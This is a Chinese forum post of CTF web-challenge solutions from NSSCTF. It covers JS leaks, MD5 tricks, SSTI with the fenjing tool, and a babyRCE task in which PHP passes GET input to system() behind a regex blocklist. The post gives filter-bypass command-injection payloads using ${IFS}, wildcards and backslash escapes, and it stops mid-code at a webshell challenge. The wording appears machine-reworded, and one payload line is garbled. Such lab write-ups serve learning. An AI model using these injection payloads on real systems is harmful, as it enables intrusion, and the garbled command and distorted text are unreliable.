NSSCTF刷题篇1

打印 上一主题 下一主题

主题 1790|帖子 1790|积分 5370

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
js范例

[SWPUCTF 2022 新生赛]js_sign

这是一道js信息泄漏的题目直接检察源码,有一个main.js文件点击之后,有一串数字和一段base64编码,解开base64编码得到这个编码为敲击码
解码在线网站:Tap Code - 许愿星 (wishingstarmoye.com)
注意要将数字之间的空格去掉
[MoeCTF 2021]2048

检察源代码

找到
  1.     req.open("GET","flag.php?score="+obj.score,true);
复制代码
这行代码然后直接

得到flag
md5范例

[SWPUCTF 2022 新生赛]奇妙的MD5

第一关特殊的字符串ffifdyop
第二第三关数组绕过
ssti模板注入

[安洵杯 2020]Normal SSTI

第一种方法
fenjing一把嗦
执行fenjing下令
  1. python -m fenjing webui
复制代码

然后填写网址一把嗦
下令执行

[MoeCTF 2021]babyRCE

检察源代码
  1. <?php
  2. $rce = $_GET['rce'];
  3. if (isset($rce)) {
  4.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  5.         system($rce);
  6.     }else {
  7.         echo "hhhhhhacker!!!"."\n";
  8.     }
  9. } else {
  10.     highlight_file(__FILE__);
  11. }
复制代码
一个下令执行主要排除了一些打开文件的下令另有空格,这里使用下面的下令进行绕过
  1. ?rce=uniq${IFS}fla?.php
  2. ?rce=c\at${IFS}fl\ag.php
  3. ?rce=ls|grepIFSf∣xargsIFSf∣xargs{IFS}-iIFScpIFScp{IFS}{}${IFS}t.txt
复制代码
应该另有很多下令就不在列举,至于flag的名字可以直接ls进行检察,并没有克制ls
[FSCTF 2023]webshell是啥捏 

源码
[code] <?php
highlight_file(__FILE__);
$
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

络腮胡菲菲

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表